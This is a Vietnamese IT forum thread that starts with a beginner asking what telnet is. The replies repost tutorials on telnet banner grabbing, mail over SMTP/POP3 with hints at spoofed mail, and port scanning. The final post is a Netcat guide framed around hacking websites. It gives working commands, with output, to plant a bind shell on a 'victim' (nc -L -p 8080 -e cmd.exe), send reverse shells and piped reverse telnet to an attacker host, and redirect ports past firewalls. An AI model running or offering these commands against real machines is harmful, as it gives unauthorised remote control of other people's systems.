Jump to content

Welcome to [ iT ] Forums
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Cộng đồng Âm nhạc Việt Nam

Hình ảnh

Telnet là gì?


 • Please log in to reply
7 replies to this topic

#1
yakata

yakata

  Thành viên mới

 • Newbies
 • 8 Bài Viết:
mình kết nối đươc với máy khác nhưng lại không thể thực hiện lệnh

#2
sanadaclan

sanadaclan

  Thành viên mới

 • Advance Member
 • 34 Bài Viết:
Telnet sử dụng cổng 23 cho phép người sử dụng truy cập hay thực thi những câu lệnh từ một máy tính khác

Để sử dụng bạn vao start->programs->Accessories->command promt gõ lệnh telnet
đia chi Ip cua bạn , chú ý tai máy xài lênh telnet phai thong qua cổng 23. Vt100 là giá trị của terminal emulation

#3
blackeye

blackeye

  Căn bản tin học tốt

 • Advance Member
 • Pip
 • 45 Bài Viết:
telnet la công cụ để thực hiện 1 phiên kết nối tới 1 hê thống đích
vd như: FTP , Pop3 , shell Remote ... nhiều lám :d

#4
yakata

yakata

  Thành viên mới

 • Newbies
 • 8 Bài Viết:
mình có đánh lệnh telnet để vào máy khác nhưng nó hiện lên bảng telnet máy02 rùi. nhưng không thể ghi các lệnh khác được. mình đánh lệnh telnet với cổng 23 thì vào không được chỉ vào được cổng 139 thôi. xin chỉ giúp các cách khác để kết nối với các máy khác

Bài viết này được chỉnh sửa bởi yakata: 28 April 2006 - 04:57 PM


#5
sanadaclan

sanadaclan

  Thành viên mới

 • Advance Member
 • 34 Bài Viết:
What is telnet?
Telnet and its close cousins rlogin and tn3270 are methods of connecting to a remote computer over the Internet that let you use programs and data just as if you were using the computer locally. Do not confuse telnet with Telenet, the old name for Sprintnet.

Telnet is a text-only protocol. At one time it was one of the most common ways to connect to other sites. Now with the growth of the web, it is hardly used. There are still a few sites and resources that can only be reached through telnet.

What can I use telnet for?

If you are a gamer, there are a number of text based games still available through telnet. See Yahoo's page on MUDs (Multi-User Dungeons).

Outside of games, unless you already know of a particular use, such as connecting to a particular government database, you probably have no use for it.


For years, many library catalogs were only reachable through telnet. Many early community resources, called free-nets, were reachable through telnet. You would have trouble finding any of these now.


Delphi's Internet service, the first nationwide Internet service available to the public, closed its telnet access on April 30, 2001.

How can I connect to a telnet address of my choosing?
If your Internet provider supports telnet (not all do), you can connect to a telnet address in one of two ways:Recent versions of Windows include a command line telnet. Begin at Start/Run and type command. On the next screen, type your telnet command. From a SLIP or PPP or ethernet connected account: type a telnet URL into the location window of your browser. To do this, your browser must be configured with a supporting version of telnet software. Two good ones, better than the built-in command line telnet for Windows, are NetTerm and CRT. Check our Internet Software Guide, whatever your platform and operating system.


If you are using Windows95, make sure you get a version that supports Win95's 32-bit stack. Although Win95 comes with a version of telnet.exe, it is a bare bones version with no zmodem transfers, and there are much better ones available.

A telnet URL takes this form: telnet://some.address:port-number. Most of the time, the port number will be the default 23. If so, it can be omitted.


From a unix shell account or other account that lets you type telnet commands, you can issue a command like this: telnet some.address port-number
What is tn3270? How can I connect to a tn3270 site?
TN3270 is a special type of telnet that is sometimes needed to connect to IBM mainframe sites. Regular telnet will often work, but if you have trouble with keypresses and commands, you may need to get a tn3270 client to add to your software.

Can I transfer files through a telnet connection using zmodem or other methods?
It depends on the version of telnet you are using. Some support zmodem, kermit, etc., and some do not. If you do have a version of telnet that supports these transfer methods, it still depends on whether you are using a SLIP or PPP or ethernet account where you run the software or you are using a shell account and using the shell account's software. SLIP, PPP, and networked accounts should have no problem, but shell accounts are not always configured to support binary transfers. Transferring binary files through a shell account requires the remote site to be operating in 8-bit mode, and many shell sites do not. In special circumstances, if you have enough knowledge of the configuration and operating system of the remote site, for example unix, you may be able to reset the mode.

How do I configure telnet software for Netscape or MSIE?


You configure telnet in Netscape 4.0 by selecting Edit/Preferences/Applications and scroll down to "URL: Telnet Protocol". Highlight it and click on the Edit button. Browse for the new software to complete the setup. Then when you enter a Telnet URL in the Netsite window, it will call up the application and launch it.

Netscape 3.0 is configured by selecting Options/General Preferences, selecting the Apps tab, and filling in the Telnet Applications window.

To set MSIE for your preferred telnet application, load Windows Explorer (not MSIE), click on View/Options/FileTypes. Scroll down to URL: Telnet Protocol, highlight, click Edit and Browse for the software.

For tn3270 configuration with either version of Netscape or MSIE, follow the same steps, but select tn3270 in place of telnet.


Mình có tìm được cho bạn một số tài liệu về Telnet này:
Telnet là một chương trình terminal đầu cuối. Nó thường dùng để login vào một máy chủ nào đó trên các daemon khác nhau của máy chủ đó! Trong bài viết này, tôi sẽ chỉ cho bạn cách thu thập một số thông tin về máy chủ qua telnet. Bạn cũng sẽ được cách check mail, gởi mail và đặc biệt là có thể tham gia vào các kênh chat IRC của nước ngoài nữa đó! Tất cả chỉ bằng Telnet!
Daemon là gì?
Daemon(hay còn được gọi là "service") là một chương trình chạy trên một cổng nhất định nào đó. Nó sẽ chịu đáp ứng lại mọi yêu cầu của client khi client này kết nối đến server trên cổng đó. Ví dụ như smtp daemon theo mặc định chạy trên cổng 25. Để có thể check mail, máy của bạn phải kết nối đến server này trên cổng 25, cổng mà smtp daemon đang nắm giữ!
Một số lệnh cơ bản của Telnet
Đây là một số lệnh cơ bản của Telnet mà bạn cần nhớ!
close đóng kết nối hiện tại
logout
display hiển thị các tham số điều khiển
mode thay đổi mode kí tự
open kết nối đến một site
quit thoát telnet
send gởi các kí tự đặc biệt
set đặt các tham số điều khiển
unset gở bỏ các tham số điều khiển đã đặt
status cho biết các thông tin về trạng thái hiện tại
toggle chốt các tham số điều khiển
slc thay đổi trạng thái của các kí tự đặc biệt
z pause telnet
! tạo một subtelnet(telnet con)
environ thay đổi các biến trạng thái
? gọi hướng dẫn sử dụng telnet
(Để biết thêm thông tin về telnet, bạn hãy gõ "man telnet" trong Linux*)
Phát hiện WEB SERVER bằng telnet
http://www.tnh.com.vn/ đang dùng web server gì nhỉ? Bạn hãy mở "MS-DOS Prompt" và gõ vào:
C:\> telnet www.tnh.com.vn 80
Chúng ta telnet đến http://www.tnh.com.vn/ ở cổng 80!
Tiếp theo bạn gõ vào "GET / HTTP/1.1"(không có dấu nháy ") và nhấn phím <Enter> hai lần, bạn sẽ nhận được những thông tin sau:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/4.0
Date: Wed, 04 Jul 2001 06:52:31 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>

Connection to host lost.

Hãy xem chúng ta thu thập được những gì?
dòng 1: phiên bản của http service: HTTP/1.1 (có khi là PHP/4.0). Đây là mã trạng thái HTML
dòng 2: http server, Microsoft-IIS/4.0
dòng 3: ngày giờ +GTM
dòng 4: phân loại nội dung
dòng 5: chiều dài của các kí tự
Chỉ cần để ý đến dòng 2, bạn có thể biết chắc ăn 100% là http://www.tnh.com.vn/ đang chạy IIS v4.0!
(Lưu ý: bạn hãy bật chế độ ghi nhật kí cho Telnet, mắt bạn không tài nào nhìn thấy được các dòng trên đâu! Nó hiện ra quá nhanh...! Hãy vào Terminal/Start Logging... và chỉ định một file nhật kí cho Telnet...!)
Bây giờ bạn thử telnet đến http://www.astalavista.box.sk/ xem sao?!

C:\> telnet www.astalavista.box.sk 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Wed, 04 Jul 2001 06:51:37 GMT
Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

Bạn có thể thấy ngay là http://www.astalavista.box.sk/ đang chạy Apache v1.3.19 trên nền Unix cùng với PHP v4.0.4!
Download và upload file bằng Telnet
Nếu bạn biết chính xác địa chỉ của một file trên http server, bạn có thể download nó về bằng cách telnet đến http server đó (ở cổng 80) và gõ vào theo dạng sau "HEAD <đường dẫn đến file cần download> HTTP/1.1" thay cho "GET / HTTP/1.1". Ví dụ như "HEAD /wordlist.txt HTTP/1.1"
Nếu http server cho phép bạn upload file(thường thì không có chuyện này đâu!), bạn hãy dùng lệnh "PUT" để upload file lên. Ví dụ như "PUT /contact.htm HTTP/1.1"
Gởi thư bằng Telnet(dùng SMTP)
SMTP - Simple Mail Transfer Protocol là một daemon thường dùng để send mail. Cổng mặc định của nó là 25. Okay, bây giờ bạn hãy mở telnet đi!

C:\> telnet mail.newmail.net 25

------ connected ------

220 digital Microsoft ESMTP MAIL Service, Version: 5.0.2195.1600 ready at Wed,
4 Jul 2001 18:47:27 +1000

-----------------------

dòng 1: mã số trạng thái 220: digital(domain hoặc địa chỉ ip của server): esmtp(extended) version 5.0.2195.1600
dòng 2: thời gian +GMT
Bây giờ thì bạn cần phải biết một số lệnh của smtp. Hãy gõ vào lệnh '?(hoặc '/?') và 'help' để gọi hướng dẫn! Tiếp theo, hãy send mail...!

----- các lệnh ------

HELO server.com (x authentication)
MAIL WROM: GPKYLEJGDGVCJVTLBXFGGMEPYOQKEDOTWFAOBUZXUWLSZLKBRNVWWCUFPEG
RCPT TO: [email protected] (địa chỉ email của người nhận)
DATA (các dữ liệu trong thư)
SUBJECT email subject (dòng subject)
một message cơ bản, cũng có khi là giả mạo
. (kết thúc message bằng một dòng chỉ có một dấu chấm '.')

----------------------

(Tôi không đề cập chi tiết cách gởi thư nặc danh ở đây, bạn hãy tham khảo bài viết "Gởi thư nặc danh và dội bom thư bằng Sendmail" sẽ rõ!)
Nhận thư qua Telnet(dùng POP3)
POP3 - Post Office Protocol Version 3. POP3 daemon thường được chạy ở cổng 110(đây là cổn chuẩn của nó). Để check mail, bạn phải kết nối đến server đang chạy POP3 daemon ở cổng 110!

C:\> telnet mail.newmail.net 110

------ connected ------

+OK DPOP Version number supressed. <[email protected]>

-----------------------

Bây giờ thì bạn có thể vào check mail được rồi đó! Hãy xem qua các lệnh sau:

----- các lệnh ------

USER username (username của bạn)
+OK dazzed nice to hear from you - password required
PASS password (mật khẩu để vào hòm thư của bạn)
+OK password accepted
LIST (liệt kê tất cả các thư)
1. 3045bytes
2. 345bytes
3. 8837bytes
RETR 2 (đọc lá thư thứ 2)

----------------------

Dễ không?
Tham gia vào các kênh chat IRC của nước ngoài!
Hãy theo tôi..!
Đầu tiên bạn telnet đến nether.net, đăng nhập với tên login là newuser và tạo một account cho bạn!

C:\> telnet nether.net
login: newuser

Okay, bây giờ hãy login vào với shell account mà bạn vừa đăng kí và chat IRC!

<[email protected]> IRC
mở IRC client
/SERVER irc.box.sk 6667
kết nối đến irc.box.sk ở cổng 6667
/NICK Dazzed
hãy chọn một nickname...!
/JOIN #lameindustries
bây giờ hãy tham gia vào kênh chat mà bạn muốn! :ehh

Port surfing(duyệt cổng)
Port surfing nghĩa là kết nối đến các cổng của một máy chủ để thu thập các thông tin, chẳng hạn như thời gian, hệ điều hành, các dịch vụ đang chạy, ...! Sau đây là danh sách một số cổng mà bạn nên biết!
Interesting ports

7 echo bất kì những gì bạn nhập vào sẽ được host gởi trả lại(echo) bạn, không hữu ích cho lắm!
11 systat rất nhiều thông tin về users
13 daytime thời gian và ngày tháng ở máy chủ
15 netstat thông tin về networks
21 ftp file transfer protocol
23 telnet nơi bạn có thể login.
25 smpt simple mail transfer protocol
37 time time
39 rlp resource location
43 whois thông tin về hosts và networks
53 domain nameserver
79 finger rất nhiều thông tin về users (thường bị disable)
80 http web server
110 pop incoming email
119 nntp usenet news groups
443 https một web server khác nhưng an toàn hơn!
512 biff mail notification
513 rlogin - remote login
514 shell remote command, không cần dùng mật khẩu! syslog remote system logging
520 route routing information protocol

Bạn thấy telnet thế nào? Tuyệt vời...! Tuy nhiên còn có một công cụ mạnh hơn cả Telnet nữa đó...! Netcat?!

#6
troioi-conkho

troioi-conkho

  Trình độ A CSTH

 • Advance Member
 • PipPip
 • 148 Bài Viết:
hay ghê - cám ơn bạn - có tài liệu để nghiên kíu gùi đây

#7
yakata

yakata

  Thành viên mới

 • Newbies
 • 8 Bài Viết:
ví dụ sau khi mình telnet vào 1 máy nào đó trong mang Lan thong qua cổng 139 thì có câu lệnh nào để mình cho chạy 1 chương trình trên máy mình đang ngồi cơ chứ. xin được chỉ giáo
à mà bạn nói công cụ Netcat còn mạnh hơn thì cậu có thể post bài lên để tham khảo không?

Bài viết này được chỉnh sửa bởi yakata: 02 May 2006 - 04:34 PM


#8
sanadaclan

sanadaclan

  Thành viên mới

 • Advance Member
 • 34 Bài Viết:
Những cái này mình đọc thấy hay giữ lai thôi
Hướng dẫn sử dụng Netcat

1. Giới thiệu
Netcat là một công cụ không thể thiếu được nếu bạn muốn @hắc một website nào đó. Vì vậy bạn cần biết một chút về Netcat.

2. Biên dịch
Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):
#define GAPING_SECURITY_HOLE
#define TELNET
- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat b᡺?ng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":."
PATH=/sbin:/usr/sbin:...:.

Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.

3. Các tùy chọn của Netcat
Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

C:\>nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

* Cú pháp:

- chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]

* Một số tùy chọn:

-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h gọi hướng dẫn
-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o file ghi nhật kí vào file
-p port chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr giả mạo địa chỉ IP nguồn là addr
-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u dùng UDP(mặc định netcat dùng TCP)
-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

4. Các ví dụ:
4.1 Chộp banner của web server
Ví dụ: nc đến 172.16.84.2, cổng 80

C:\>nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html

Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa)

C:\>nc -vv 172.16.84.1 80
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html

sent 17, rcvd 245: NOTSOCK

Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

- xem file nhat_ki.log

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....

dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

4.2 Quét cổng
- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1

[[email protected] /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open

- nếu bạn cần scan các cổng UDP, dùng -u

[[email protected] /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

4.3 Biến Netcat thành một trojan
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error

- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

E:\>cd test
cd test

E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F

Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free

C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK

Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.

E:\>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...

- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ:

netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163

- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.

- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

5. Kĩ thuật tiên tiến
5.1 Telnet nghịch chuuyển
- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ:

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:

+ cửa sổ Netcat (1)

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_

+ cửa sổ Netcat (2)

C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²?
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b
drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất:

[[email protected]_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_

Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.

5.2 Tạo kênh sau
Cũng tương tự như telnet nghịch chuyển.

- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn:

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...

- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell:

E:\>nc -e cmd.exe 172.16.84.1 80

Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo.

C:\>nc -nvv -l -p 80
listenning pm [any] 80 ...
connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

E:\>

5.3 Đổi hướng cổng
Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau:

- chạy nc trên cổng bất kì:

E:\>nc -nvv -L -p 1234 -e cmd.exe
listening on [any] 1234 ...

- chạy tunnel hoặc fpipe để đổi hướng cổng

C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234

C:\>fpipe -l 53 -r 1234 127.0.0.1


tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe.

Đổi hướng cổng là một cách để đi vòng qua firewalls.


Perfumista - Thong tin nuoc hoa

Stars Counter Game

Balloon vs. Thorns

MU Phuc Hung

Làm Việc Tài Nhà

Mu Da Nang

Tuyển Nhân Viên Bán Hàng

Tư vấn sức khỏe trực tuyến

Close [X]